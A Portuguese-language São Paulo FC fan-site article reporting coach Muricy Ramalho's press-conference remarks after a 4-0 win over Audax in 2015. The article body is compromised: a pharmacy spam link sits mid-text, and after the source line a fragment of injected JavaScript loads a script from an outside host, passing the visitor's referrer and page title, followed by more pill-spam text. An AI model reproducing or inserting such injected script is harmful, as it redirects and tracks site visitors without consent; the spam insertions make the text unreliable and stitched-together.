Noticias

“O mais legal é que a torcida já apoiou hoje”

“O mais legal é que a torcida já apoiou hoje. A torcida nos ajudou muito no ano passado. Claro que fica triste, mas voltou a nos ajudar”. A frase do técnico Muricy Ramalho durante a coletiva de imprensa deste sábado (21), após a goleada sobre o Audax por 4 a 0 pelo Campeonato Paulista, retrata o incentivo que os jogadores são-paulinos tiveram para manter a invencibilidade na competição estadual.

Do primeiro ao último minuto, os torcedores cantaram e empurraram o time no duelo que marcou o reencontro da equipe com o Morumbi. “É sempre importante, o campeonato continua. É importante que eles nos empurrem bastante. A gente faz um apelo, aqui todo mundo é São Paulo e que na quarta eles nos ajudem, a gente vai precisar” completou o treinador, visivelmente satisfeito com o resultado na capital paulista neste final de semana.

“Ganhar é importante, te dá confiança. Pode ser que o nível não seja tão alto, os grandes estão preparados fisicamente. Nessa competição a gente tem muitos gols. A gente está indo bem, mas tem que ir bem na outra (Libertadores). Claro que jogamos um jogo só, a gente está muito exigente. Mas não podemos jogar tão pouco como na quarta-feira”, opinou.

buy a at low price medications no prescription – http://nicofficial.mhs.narotama.ac.id/2016/11/30/buy-a-at-low-price-medications-no-prescription/ muricy spfc

Após golear o Audax, o Tricolor terá o Danubio-URU pela frente em duelo válido pela segunda rodada do Grupo 2 na Copa Bridgestone Libertadores de 2015. Se no torneio internacional o Tricolor precisa vencer a primeira, no Campeonato Paulista a situação é outra. Com 16 pontos em seis jogos, o São Paulo segue invicto e com melhor campanha.

Dono do melhor ataque disparado, com 18 gols, o time são-paulino tem também o artilheiro do Estadual: Alexandre Pato, com seis gols, que balançou as redes duas vezes na goleada sobre o Audax. “Tínhamos um desgaste físico grande, mas precisávamos usar os jogadores para recuperar na parte emocional”, revelou o comandante, que acrescentou.

“Não é fácil sair de um jogo daquele, atuando mal, e enfrentar um time chato. Conseguimos ir bem. A vida segue. A gente tem de jogar melhor. Essa partida (contra o Corinthians) foi muito ruim, a gente não fez o goleiro adversário trabalhar. Isso deixou a gente preocupado”, finalizou.

Fonte: SiteOficial s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; add in cart cheap tablets on line

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

19 − catorze =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Noticias

Mais em Noticias

Fora! Pato encaminha rescisão de contrato com o São Paulo e se despede do elenco

saopauloadmin19 de agosto de 2020

10 fatos que orgulham todos os torcedores do São Paulo

saopauloadmin9 de julho de 2020

Dodô diz que quando jogou no são Paulo recusou ofertas do Barça e Inter de Milão

saopauloadmin16 de junho de 2020

São Paulo reforça posição contra o racismo: ‘Vidas negras importam’

saopauloadmin1 de junho de 2020

Osorio fala sobre saída do São Paulo em 2015

saopauloadmin31 de maio de 2020

Osorio diz ter saudade do São Paulo e coloca volta ao Brasil como um de seus 3 objetivos

saopauloadmin29 de maio de 2020

Luis Fabiano revela desejo em voltar a jogar, mas diz que está “pronto para parar”

saopauloadmin22 de maio de 2020

Diniz critica afobação por retorno aos treinos: “Ninguém joga sozinho”

saopauloadmin20 de maio de 2020

Com “combo”, São Paulo renova patrocínios

saopauloadmin10 de maio de 2020